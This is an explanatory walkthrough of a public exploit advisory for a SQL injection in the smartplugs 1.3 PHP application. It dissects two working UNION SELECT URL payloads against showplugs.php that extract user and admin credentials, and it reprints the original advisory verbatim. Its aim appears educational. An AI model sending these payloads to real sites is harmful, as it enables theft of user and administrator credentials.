Understanding the smartplugs 1.3 SQL Injection Exploit

Understanding the smartplugs 1.3 SQL Injection Exploit
What this paper is
This paper details a SQL injection vulnerability found in version 1.3 of the "smartplugs" web application. Specifically, it targets the showplugs.php file, allowing an attacker to extract sensitive user and login information by manipulating the domain GET parameter. The exploit leverages SQL's UNION operator to combine the results of a malicious query with the original, intended query.
Simple technical breakdown
The showplugs.php script likely takes a domain value from the user's web request and uses it in a database query. If the script doesn't properly sanitize or validate this input, an attacker can inject SQL commands.
The exploit works by:
- Injecting a malicious query: The attacker sends a specially crafted string as the
domainparameter. - Using
UNION SELECT: This SQL command allows combining the results of two or moreSELECTstatements. The attacker'sSELECTstatement replaces or augments the original one. - Extracting data: The attacker's
SELECTstatement is designed to retrieve specific columns (likeid,username,password,email) from database tables (user,logins) and concatenate them with a separator (e.g.,:) for easy reading. - Bypassing original query logic: The attacker uses values like
-9999999999and comments (--+) to ensure the original query returns no results or is effectively disabled, allowing their injected query's results to be displayed.
Complete code and payload walkthrough
The provided "code" is not executable code in the traditional sense but rather URL parameters demonstrating the exploit.
Exploitable users payload:www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+select+1,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6+from+user--+
www.site.com/smartplugs/showplugs.php?domain=: This is the base URL and the vulnerable parameter.-9999999999: This is a numerical value for thedomainparameter. It's chosen to be a value that is highly unlikely to match any valid domain in the database, ensuring the original query returns no rows.': This single quote is crucial. It closes the string literal that thedomainparameter is likely enclosed in within the original SQL query. For example, the original query might look something likeSELECT col1, col2, col3, col4, col5, col6 FROM ... WHERE domain = 'USER_SUPPLIED_DOMAIN'. The injected quote breaks out of this string.+union+select+: This is the core of the injection.UNION: This SQL operator combines the result set of two or moreSELECTstatements.SELECT: This keyword initiates a query to retrieve data.
1,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6: This is the attacker'sSELECTlist.1,3,4,5,6: These are placeholder values. TheUNIONoperator requires that the number of columns selected in both the original and injected queries match. Since the original query likely selects 6 columns (implied by the numbers 1-6 in the injected query), these numbers ensure the column count is correct. They will likely appear in the output but are not the primary target.concat(id,0x3a,username,0x3a,password,0x3a,email): This is the most important part.concat(): This SQL function concatenates (joins) multiple strings together.id,username,password,email: These are column names from theusertable. The attacker is attempting to retrieve these sensitive pieces of information.0x3a: This is the hexadecimal representation of the ASCII character:. It's used as a delimiter between the concatenated values, making the output readable.
from+user: This specifies that the data should be retrieved from theusertable.--+: This is a SQL comment.--: In many SQL dialects, this signifies the start of a single-line comment.+: The plus sign here is often used in URL encoding to represent a space. However, in the context of SQL comments, it might be used to ensure the comment extends to the end of the line, effectively ignoring any subsequent parts of the original query that might cause syntax errors.
Exploitable admin payload:www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+select+1,concat(username,0x3a,password),3,4,5,6+from+logins--+
- This payload is very similar to the "Exploitable users" payload.
concat(username,0x3a,password): This part is modified to specifically extractusernameandpasswordfrom theloginstable.from+logins: This specifies that the data should be retrieved from theloginstable, which is likely to contain administrative credentials.
Mapping list:
| Code Fragment/Block | Practical Purpose
Original Exploit-DB Content (Verbatim)
----------------------------Information------------------------------------------------
+Name : smartplugs 1.3 SQL Injection showplugs.php
+Autor : Easy Laster
+Date : 03.03.2010
+Script : smartplugs 1.3 http://www.smart-plugs.com/spv1/
+Download : -------------
+Price : 170$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.
---------------------------------------------------------------------------------------
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|
----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/smartplugs/showplugs.php?domain=
+Exploitable users : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+select
+1,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6+from+user--+
Exploitable admin : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+
select+1,concat(username,0x3a,password),3,4,5,6+from+logins--+
-----------------------------------------------------------------------------------------